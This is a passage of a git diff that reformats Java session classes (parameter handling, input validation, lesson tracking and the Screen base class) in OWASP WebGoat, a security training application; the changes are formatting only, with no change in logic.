- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Parameter implements Comparable
 {
 
-    String name;
+	String name;
 
-    String value;
+	String value;
 
-
-    public Parameter(String name, String value)
-    {
-	this.name = name;
-	this.value = value;
-    }
-
-
-    public String getName()
-    {
-	return name;
-    }
-
-
-    public String getValue()
-    {
-	return value;
-    }
-
-
-    //@Override
-    public boolean equals(Object obj)
-    {
-	if (obj instanceof Parameter)
+	public Parameter(String name, String value)
 	{
-	    Parameter other = (Parameter) obj;
-	    return (name.equals(other.getName()) && value.equals(other
-		    .getValue()));
+		this.name = name;
+		this.value = value;
 	}
-	return false;
-    }
 
+	public String getName()
+	{
+		return name;
+	}
 
-    //@Override
-    public int hashCode()
-    {
-	return toString().hashCode();
-    }
+	public String getValue()
+	{
+		return value;
+	}
 
+	// @Override
+	public boolean equals(Object obj)
+	{
+		if (obj instanceof Parameter)
+		{
+			Parameter other = (Parameter) obj;
+			return (name.equals(other.getName()) && value.equals(other.getValue()));
+		}
+		return false;
+	}
 
-    //@Override
-    public String toString()
-    {
-	return (name + "=" + value);
-    }
+	// @Override
+	public int hashCode()
+	{
+		return toString().hashCode();
+	}
 
+	// @Override
+	public String toString()
+	{
+		return (name + "=" + value);
+	}
 
-    public int compareTo(Object o)
-    {
-	return toString().compareTo(o.toString());
-    }
+	public int compareTo(Object o)
+	{
+		return toString().compareTo(o.toString());
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java
index ee14a37b1..0822fdbe3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java
@@ -1,62 +1,59 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class ParameterNotFoundException extends Exception
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = 3286112913299408382L;
 
+	/**
+	 * Constructs a new ParameterNotFoundException with no detail message.
+	 */
+	public ParameterNotFoundException()
+	{
+		super();
+	}
 
 	/**
-     *  Constructs a new ParameterNotFoundException with no detail message.
-     */
-    public ParameterNotFoundException()
-    {
-	super();
-    }
-
-
-    /**
-     *  Constructs a new ParameterNotFoundException with the specified detail
-     *  message.
-     *
-     *@param  s  the detail message
-     */
-    public ParameterNotFoundException(String s)
-    {
-	super(s);
-    }
+	 * Constructs a new ParameterNotFoundException with the specified detail message.
+	 * 
+	 * @param s
+	 *            the detail message
+	 */
+	public ParameterNotFoundException(String s)
+	{
+		super(s);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
index abb3f6bf6..96c5c2026 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
@@ -1,40 +1,38 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.Enumeration;
 import java.util.StringTokenizer;
 import java.util.Vector;
 import java.util.regex.Pattern;
-
 import javax.servlet.ServletRequest;
-
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -44,15 +42,14 @@ public class ParameterParser
 {
 
 	private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
-																		// allow
-																		// #&
-																		// specifically
+	// allow
+	// #&
+	// specifically
 
 	private ServletRequest request;
 
 	/**
-	 * Constructs a new ParameterParser to handle the parameters of the given
-	 * request.
+	 * Constructs a new ParameterParser to handle the parameters of the given request.
 	 * 
 	 * @param request
 	 *            the servlet request
@@ -80,7 +77,8 @@ public class ParameterParser
 			if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
 			{
 				clean.append(c);
-			} else
+			}
+			else
 			{
 				clean.append('.');
 			}
@@ -104,8 +102,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a boolean, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a boolean, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -118,8 +116,7 @@ public class ParameterParser
 		try
 		{
 			return getBooleanParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -141,8 +138,7 @@ public class ParameterParser
 		try
 		{
 			return new Boolean(getSubParameter(first, next)).booleanValue();
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -165,9 +161,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a byte, with a default. Returns the
-	 * default value if the parameter is not found or cannot be converted to a
-	 * byte.
+	 * Gets the named parameter value as a byte, with a default. Returns the default value if the
+	 * parameter is not found or cannot be converted to a byte.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -180,8 +175,7 @@ public class ParameterParser
 		try
 		{
 			return getByteParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -203,15 +197,16 @@ public class ParameterParser
 		if (param.length() == 0)
 		{
 			throw new ParameterNotFoundException(name + " is empty string");
-		} else
+		}
+		else
 		{
 			return (param.charAt(0));
 		}
 	}
 
 	/**
-	 * Gets the named parameter value as a char, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a char, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -224,8 +219,7 @@ public class ParameterParser
 		try
 		{
 			return getCharParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -262,8 +256,7 @@ public class ParameterParser
 		try
 		{
 			return getClassNameParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -286,8 +279,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a double, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a double, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -300,8 +293,7 @@ public class ParameterParser
 		try
 		{
 			return getDoubleParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -324,8 +316,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a float, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a float, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -338,16 +330,15 @@ public class ParameterParser
 		try
 		{
 			return getFloatParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
 	}
 
 	/**
-	 * Gets the named parameter value as an IP String, with a default. Returns
-	 * the default value if the parameter is not found or is the empty string.
+	 * Gets the named parameter value as an IP String, with a default. Returns the default value if
+	 * the parameter is not found or is the empty string.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -360,8 +351,7 @@ public class ParameterParser
 		try
 		{
 			return getIPParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -372,8 +362,7 @@ public class ParameterParser
 	 * 
 	 * @param name
 	 *            the parameter name
-	 * @return the parameter value as a valid IP String or an Empty string if
-	 *         invalid
+	 * @return the parameter value as a valid IP String or an Empty string if invalid
 	 * @exception ParameterNotFoundException
 	 *                if the parameter was not found or was the empty string
 	 */
@@ -386,10 +375,12 @@ public class ParameterParser
 		if (values == null)
 		{
 			throw new ParameterNotFoundException(name + " not found");
-		} else if (values[0].length() == 0)
+		}
+		else if (values[0].length() == 0)
 		{
 			throw new ParameterNotFoundException(name + " was empty");
-		} else
+		}
+		else
 		{
 			// trim illegal characters
 			value = clean(values[0].trim());
@@ -430,15 +421,15 @@ public class ParameterParser
 						{
 							valid = false;
 						}
-					}
-					catch (Exception e)
+					} catch (Exception e)
 					{
 						valid = false;
 					}
 
 					octetCount++;
 				}
-			} else
+			}
+			else
 			{
 				// Not a valid IP
 				valid = false;
@@ -472,8 +463,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a int, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a int, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -486,8 +477,7 @@ public class ParameterParser
 		try
 		{
 			return getIntParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -510,8 +500,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a long, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a long, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -524,16 +514,15 @@ public class ParameterParser
 		try
 		{
 			return getLongParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
 	}
 
 	/**
-	 * Determines which of the required parameters were missing from the
-	 * request. Returns null if all the parameters are present.
+	 * Determines which of the required parameters were missing from the request. Returns null if
+	 * all the parameters are present.
 	 * 
 	 * @param requestuired
 	 *            Description of the Parameter
@@ -556,7 +545,8 @@ public class ParameterParser
 		if (missing.size() == 0)
 		{
 			return null;
-		} else
+		}
+		else
 		{
 			String[] ret = new String[missing.size()];
 			missing.copyInto(ret);
@@ -572,10 +562,7 @@ public class ParameterParser
 	 */
 	public Enumeration getParameterNames()
 	{
-		if (request == null)
-		{
-			return (null);
-		}
+		if (request == null) { return (null); }
 
 		return request.getParameterNames();
 	}
@@ -589,10 +576,7 @@ public class ParameterParser
 	 */
 	public String[] getParameterValues(String name)
 	{
-		if (request == null)
-		{
-			return (null);
-		}
+		if (request == null) { return (null); }
 
 		return request.getParameterValues(name);
 	}
@@ -611,8 +595,7 @@ public class ParameterParser
 		try
 		{
 			return getRawParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -634,10 +617,8 @@ public class ParameterParser
 		if (values == null)
 		{
 			throw new ParameterNotFoundException(name + " not found");
-		} else if (values[0].length() == 0)
-		{
-			throw new ParameterNotFoundException(name + " was empty");
 		}
+		else if (values[0].length() == 0) { throw new ParameterNotFoundException(name + " was empty"); }
 
 		return (values[0]);
 	}
@@ -659,8 +640,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a short, with a default. Returns the
-	 * default value if the parameter is not found.
+	 * Gets the named parameter value as a short, with a default. Returns the default value if the
+	 * parameter is not found.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -673,8 +654,7 @@ public class ParameterParser
 		try
 		{
 			return getShortParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -697,10 +677,12 @@ public class ParameterParser
 		if (values == null)
 		{
 			throw new ParameterNotFoundException(name + " not found");
-		} else if (values[0].length() == 0)
+		}
+		else if (values[0].length() == 0)
 		{
 			throw new ParameterNotFoundException(name + " was empty");
-		} else
+		}
+		else
 		{
 			// trim illegal characters
 			value = clean(values[0].trim());
@@ -716,8 +698,8 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the named parameter value as a String, with a default. Returns the
-	 * default value if the parameter is not found or is the empty string.
+	 * Gets the named parameter value as a String, with a default. Returns the default value if the
+	 * parameter is not found or is the empty string.
 	 * 
 	 * @param name
 	 *            the parameter name
@@ -730,8 +712,7 @@ public class ParameterParser
 		try
 		{
 			return getStringParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
@@ -753,16 +734,15 @@ public class ParameterParser
 		try
 		{
 			return getSubParameter(first, next);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
 	}
 
 	/**
-	 * Gets the parameter named 'next' following the parameter 'first'. Presumes
-	 * the structure: first=firstvalue&next=nextValue
+	 * Gets the parameter named 'next' following the parameter 'first'. Presumes the structure:
+	 * first=firstvalue&next=nextValue
 	 * 
 	 * @param first
 	 *            Description of the Parameter
@@ -780,20 +760,19 @@ public class ParameterParser
 		if (values == null)
 		{
 			throw new ParameterNotFoundException(first + " not found");
-		} else if (values[0].length() == 0)
+		}
+		else if (values[0].length() == 0)
 		{
 			throw new ParameterNotFoundException(first + " was empty");
-		} else
+		}
+		else
 		{
 			value = clean(values[0].trim());
 
 			int idx = value.indexOf("&") + 1;
 
 			// index of first char of first sub-param name
-			if (idx == 0)
-			{
-				throw new ParameterNotFoundException("No subparameter key");
-			}
+			if (idx == 0) { throw new ParameterNotFoundException("No subparameter key"); }
 
 			value = value.substring(idx);
 
@@ -803,17 +782,15 @@ public class ParameterParser
 
 			// System.out.println("= = = = = =Parameter parser nextValueIndex =
 			// " + nextValueIndex );
-			if (nextValueIndex < 0)
-			{
-				throw new ParameterNotFoundException("No subparameter value");
-			}
+			if (nextValueIndex < 0) { throw new ParameterNotFoundException("No subparameter value"); }
 
 			nextValueIndex += (next.length() + 1);
 
 			if (nextValueIndex >= 0)
 			{
 				value = value.substring(nextValueIndex);
-			} else
+			}
+			else
 			{
 				throw new ParameterNotFoundException(next + " not found");
 			}
@@ -861,35 +838,30 @@ public class ParameterParser
 		try
 		{
 			return getWordParameter(name);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			return def;
 		}
 	}
 
 	/**
-	 * Gets the specified parameter from the request and validates it against
-	 * the provided regular expression. If the regular expression check fails,
-	 * the default value is returned instead.
+	 * Gets the specified parameter from the request and validates it against the provided regular
+	 * expression. If the regular expression check fails, the default value is returned instead.
 	 * 
 	 * @param name
 	 *            The name of the parameter to retrieve from the request.
 	 * @param def
 	 *            The default value of the parameter.
 	 * @param regexpattern
-	 *            The precompiled regular expression to be used to validate the
-	 *            parameter.
-	 * @return The validated parameter value, or the default value if validation
-	 *         failed.
+	 *            The precompiled regular expression to be used to validate the parameter.
+	 * @return The validated parameter value, or the default value if validation failed.
 	 */
 	private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
 	{
 		try
 		{
 			return getRegexParameter(name, regexpattern);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			// System.out.println("Exception occured in defined pattern match");
 			// e.printStackTrace();
@@ -898,29 +870,27 @@ public class ParameterParser
 	}
 
 	/**
-	 * Gets the specified parameter from the request and validates it against
-	 * the provided regular expression. If the regular expression check fails,
-	 * the default value is returned instead.
+	 * Gets the specified parameter from the request and validates it against the provided regular
+	 * expression. If the regular expression check fails, the default value is returned instead.
 	 * 
 	 * @param name
 	 *            The name of the parameter to retrieve from the request.
 	 * @param def
 	 *            The default value of the parameter.
 	 * @param regexpattern
-	 *            The precompiled regular expression to be used to validate the
-	 *            parameter.
-	 * @return The validated parameter value, or the default value if validation
-	 *         failed.
+	 *            The precompiled regular expression to be used to validate the parameter.
+	 * @return The validated parameter value, or the default value if validation failed.
 	 */
 	private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
-																	   ValidationException
+			ValidationException
 	{
 		String param = getStringParameter(name);
 
 		if (regexpattern.matcher(param).matches())
 		{
 			return param;
-		} else
+		}
+		else
 		{
 			// System.out.println(param + " didn't match defined pattern.");
 			throw new ValidationException(name + " contained an invalid value");
@@ -928,7 +898,7 @@ public class ParameterParser
 	}
 
 	public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
-																	 ValidationException
+			ValidationException
 	{
 		String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
 		Pattern alphaPattern = Pattern.compile(alphaRegEx);
@@ -937,7 +907,7 @@ public class ParameterParser
 	}
 
 	public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
-																	   ValidationException
+			ValidationException
 	{
 		String numericRegEx = "^\\d{0," + maxLength + "}$";
 		Pattern numericPattern = Pattern.compile(numericRegEx);
@@ -1025,8 +995,7 @@ public class ParameterParser
 		return getRegexParameter(name, def, datepattern);
 	}
 
-	private static final String URLREGEX =
-			"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
+	private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
 
 	private static final Pattern URLpattern = Pattern.compile(URLREGEX);
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java
index 05f7b1a3d..c9ee5945a 100755
--- a/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java
@@ -1,90 +1,103 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.HashMap;
 import java.util.Map;
 import java.util.Properties;
 
-public class RandomLessonTracker extends LessonTracker {
+
+public class RandomLessonTracker extends LessonTracker
+{
 
 	private String[] stages;
-	
+
 	private String stage;
-	
+
 	private Map<String, Boolean> completed = new HashMap<String, Boolean>();
-	
-	public RandomLessonTracker(String[] stages) {
-		if (stages == null)
-			stages = new String[0];
+
+	public RandomLessonTracker(String[] stages)
+	{
+		if (stages == null) stages = new String[0];
 		this.stages = stages;
 	}
-	
-	public void setStage(String stage) {
+
+	public void setStage(String stage)
+	{
 		this.stage = stage;
 	}
-	
-	public String getStage() {
-		if (this.stage == null && stages.length > 0)
-			return stages[0];
+
+	public String getStage()
+	{
+		if (this.stage == null && stages.length > 0) return stages[0];
 		return this.stage;
 	}
-	
-	public void setStageComplete(String stage, boolean complete) {
+
+	public void setStageComplete(String stage, boolean complete)
+	{
 		completed.put(stage, Boolean.valueOf(complete));
-		for (int i=0; i<stages.length-1; i++)
-			if (stages[i].equals(stage))
-				setStage(stages[i+1]);
+		for (int i = 0; i < stages.length - 1; i++)
+			if (stages[i].equals(stage)) setStage(stages[i + 1]);
 	}
-	
-	public boolean hasCompleted(String stage) {
+
+	public boolean hasCompleted(String stage)
+	{
 		Boolean complete = completed.get(stage);
 		return complete == null ? false : complete.booleanValue();
 	}
-	
+
 	@Override
-	public boolean getCompleted() {
-		for (int i=0; i<stages.length; i++)
-			if (!hasCompleted(stages[i]))
-				return false;
+	public boolean getCompleted()
+	{
+		for (int i = 0; i < stages.length; i++)
+			if (!hasCompleted(stages[i])) return false;
 		return true;
 	}
-	
+
 	@Override
-	public void setCompleted(boolean complete) {
-		if (complete == true)
-			throw new UnsupportedOperationException("Use individual stage completion instead");
-		for (int i=0;i<stages.length; i++)
+	public void setCompleted(boolean complete)
+	{
+		if (complete == true) throw new UnsupportedOperationException("Use individual stage completion instead");
+		for (int i = 0; i < stages.length; i++)
 			setStageComplete(stages[i], false);
 		setStage(stages[0]);
 	}
-	
-    protected void setProperties(Properties props, Screen screen) {
-	    super.setProperties(props, screen);
-	    for (int i=0; i<stages.length; i++) {
-	    	String p = props.getProperty(screen.getTitle() + "." + stages[i] + ".completed");
-	    	if (p != null) {
-	    		setStageComplete(stages[i], Boolean.valueOf(p));
-	    	}
-	    }
-	    setStage(props.getProperty(screen.getTitle() + ".stage"));
-    }
-    
-    public void store(WebSession s, Screen screen, String user) {
-    	for (int i=0; i<stages.length; i++) {
-    		if (hasCompleted(stages[i]))
-    			lessonProperties.setProperty(screen.getTitle() + "." + stages[i] + ".completed", Boolean.TRUE.toString());
-    	}
+
+	protected void setProperties(Properties props, Screen screen)
+	{
+		super.setProperties(props, screen);
+		for (int i = 0; i < stages.length; i++)
+		{
+			String p = props.getProperty(screen.getTitle() + "." + stages[i] + ".completed");
+			if (p != null)
+			{
+				setStageComplete(stages[i], Boolean.valueOf(p));
+			}
+		}
+		setStage(props.getProperty(screen.getTitle() + ".stage"));
+	}
+
+	public void store(WebSession s, Screen screen, String user)
+	{
+		for (int i = 0; i < stages.length; i++)
+		{
+			if (hasCompleted(stages[i]))
+				lessonProperties.setProperty(screen.getTitle() + "." + stages[i] + ".completed", Boolean.TRUE
+						.toString());
+		}
 		lessonProperties.setProperty(screen.getTitle() + ".stage", getStage());
 		super.store(s, screen, user);
-    }
-    
-    public String toString() {
-    	StringBuffer buff = new StringBuffer();
-    	buff.append(super.toString());
-    	for (int i=0; i<stages.length; i++) {
-    		buff.append("    - completed " + stages[i] + " :....... " + hasCompleted(stages[i]) + "\n");
-    	}
-    	buff.append("    - currentStage:....... " + getStage() + "\n");
-    	return buff.toString();
-    }
+	}
+
+	public String toString()
+	{
+		StringBuffer buff = new StringBuffer();
+		buff.append(super.toString());
+		for (int i = 0; i < stages.length; i++)
+		{
+			buff.append("    - completed " + stages[i] + " :....... " + hasCompleted(stages[i]) + "\n");
+		}
+		buff.append("    - currentStage:....... " + getStage() + "\n");
+		return buff.toString();
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Screen.java b/main/project/JavaSource/org/owasp/webgoat/session/Screen.java
index 3004d6a89..62b301f94 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/Screen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Screen.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.PrintWriter;
 import java.util.Properties;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.HtmlColor;
 import org.apache.ecs.StringElement;
@@ -11,326 +11,309 @@ import org.apache.ecs.html.Font;
 import org.apache.ecs.html.IMG;
 import org.owasp.webgoat.lessons.AbstractLesson;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public abstract class Screen
 {
 
-    /**
-     *  Description of the Field
-     */
-    public static int MAIN_SIZE = 375;
-
-    //private Head head;
-    private Element content;
-
-    final static IMG logo = new IMG("images/aspectlogo-horizontal-small.jpg")
-	    .setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0);
-
-
-    /**
-     *  Constructor for the Screen object
-     */
-
-    public Screen()
-    {}
-
-
-    // FIXME: Each lesson should have a role assigned to it.  Each user/student
-    //        should also have a role(s) assigned.  The user would only be allowed
-    // 		  to see lessons that correspond to their role.  Eventually these roles
-    //		  will be stored in the internal database.  The user will be able to hack
-    // 		  into the database and change their role.  This will allow the user to
-    //		  see the admin screens, once they figure out how to turn the admin switch on.
-    public abstract String getRole();
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-
-    protected abstract Element createContent(WebSession s);
-
-
-    /**
-     *  Gets the credits attribute of the Screen object
-     *
-     * @return    The credits value
-     */
-    public abstract Element getCredits();
-
-
-    /**
-     *  Creates a new lessonTracker object.
-     *
-     * @param  props  The properties file that was used to persist the user data.
-     * @return        Description of the Return Value
-     */
-
-    public LessonTracker createLessonTracker(Properties props)
-    {
-
-	// If the lesson had any specialized properties in the user persisted properties,
-	// now would be the time to pull them out.
-
-	return createLessonTracker();
-    }
-
-
-    /**
-     *  This allows the screens to provide a custom LessonTracker object if needed.
-     *
-     * @return    Description of the Return Value
-     */
-    public LessonTracker createLessonTracker()
-    {
-	return new LessonTracker();
-    }
-
-
-    /**
-     *  Gets the lessonTracker attribute of the AbstractLesson object
-     *
-     * @param  userName  Description of the Parameter
-     * @return           The lessonTracker value
-     */
-
-    public LessonTracker getLessonTracker(WebSession s)
-    {
-	UserTracker userTracker = UserTracker.instance();
-	return userTracker.getLessonTracker(s, this);
-    }
-
-
